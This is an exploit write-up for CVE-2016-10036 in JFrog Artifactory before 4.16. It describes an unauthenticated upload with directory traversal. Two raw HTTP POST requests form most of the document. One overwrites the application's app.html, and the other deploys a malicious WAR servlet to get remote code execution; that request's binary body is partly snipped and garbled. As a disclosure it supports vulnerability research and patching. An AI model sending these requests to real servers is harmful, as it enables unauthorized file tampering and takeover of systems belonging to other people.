# Exploit Title: Jfrog Artifactory < 4.16 - Unauthenticated Arbitrary File Upload / Remote Command Execution # Date: 2018-04-25 # Exploit Author: Alessio Sergi # Vendor Homepage: https://jfrog.com/artifactory/ # Software Link: https://bintray.com/jfrog/artifactory/download_file?file_path=jfrog-artifactory-oss-4.15.0.zip # CVE : CVE-2016-10036 Jfrog Artifactory < 4.16 is vulnerable to unauthenticated arbitrary file upload and directory traversal vulnerabilities. The vulnerabilities are within the upload api "/artifactory/ui/artifact/upload", require that "Allow Anonymous Access" is enabled (as it is on a default installation) and can be abused to create or overwrite files on the server. Specifically, it is possible to create or overwrite any files inside the application folder (scenario 1) or deploy a new application (scenario 2) and execute arbitrary code on the server. Scenario 1: It is possible to modify the html files of the application just by executing an http post request like the one below, which exploits a directory traversal vulnerability on the parameter "filename" to insert the javascript code "" within the file app.html : ****** POST /artifactory/ui/artifact/upload HTTP/1.1 Host: [removed] User-Agent: [removed] Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Length: 1749 Content-Type: multipart/form-data; boundary=---------------------------6085305491255810029929874687 Connection: close -----------------------------6085305491255810029929874687 Content-Disposition: form-data; name="file"; filename="../../../tomcat/webapps/artifactory/webapp/app.html" Content-Type: application/zip -----------------------------6085305491255810029929874687-- ****** (It is also possible to exploit this vulnerability to create JSP files within the application folder, but the tomcat used by Artifactory on a default installation won't execute them.) Scenario 2: It is possible to exploit the same vulnerability to deploy a malicious servlet application on the tomcat server and obtain remote code execution: ****** POST /artifactory/ui/artifact/upload HTTP/1.1 Host: [removed] User-Agent: [removed] Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Length: 3515 Content-Type: multipart/form-data; boundary=---------------------------6085305491255810029929874687 Connection: close -----------------------------6085305491255810029929874687 Content-Disposition: form-data; name="file"; filename="../../../tomcat/webapps/malicious-servlet.war" Content-Type: application/zip PKi?1/2i?1/23[--SNIP--] WEB-INF/lib/PKi?1/2i?1/2i?1/2i?1/2i?1/2i?1/2ri?1/2i?1/2> i?1/2i?1/2i?1/2i?1/2 -----------------------------6085305491255810029929874687-- ******